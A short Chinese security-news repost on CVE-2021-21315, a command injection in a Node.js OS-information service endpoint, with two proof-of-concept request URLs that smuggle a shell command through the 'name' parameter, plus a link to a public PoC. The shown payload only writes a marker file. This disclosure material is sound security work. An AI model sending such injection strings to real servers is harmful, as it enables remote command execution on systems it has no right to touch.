CVE-2021-21315 Node.JS OS命令执行

张 安全界 5 年前
7.53W 0
华盟原创文章投稿奖励计划 

文章来源:安全鸭

CVE-2021-21315 Node.JS OS sanitize service Parameters Command Injection

[PoC]

[Victim Site]/api/getServices?name=$(echo -e 'Sekurak' > pwn.txt)

[Victim Site]/api/getServices?name[]=$(echo -e 'Sekurak' > pwn.txt)

CVE-2021-21315 Node.JS OS命令执行

CVE-2021-21315 Node.JS OS命令执行

https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC

CVE-2021-21315(1),OS(2),Node.js(4),命令执行(3)
本文原创,作者:张,其版权均为华盟网所有。如需转载,请注明出处:https://www.77169.net/html/276531.html
张官方

1.49K篇文章 83.74M总阅读量

相关文章

发表回复